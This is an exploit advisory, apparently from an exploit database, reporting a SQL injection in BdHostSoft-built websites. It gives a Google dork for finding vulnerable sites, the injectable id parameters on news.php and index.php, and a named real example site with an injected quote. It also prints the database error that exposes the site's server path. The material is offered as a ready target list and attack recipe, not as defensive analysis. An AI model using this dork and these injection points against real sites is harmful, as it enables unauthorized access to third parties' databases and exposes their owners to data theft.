#################################################################################################
# Exploit Title : BdHostSoft WebHosting Company Bangladesh SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 04/09/2018
# Vendor Homepage : bdhostsoft.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork : intext:''All Rights Reserved BDHOST''
# Exploit :
/news.php?id=[SQL Injection]
/index.php?id=[SQL Injection]
#################################################################################################
# Example Site => iteit.edu.bd/news.php?id=8%27 => [ Proof of Concept ] => archive.is/VoQRQ
# SQL Database Error =>
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/edubdeit/public_html/news.php on line 115
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################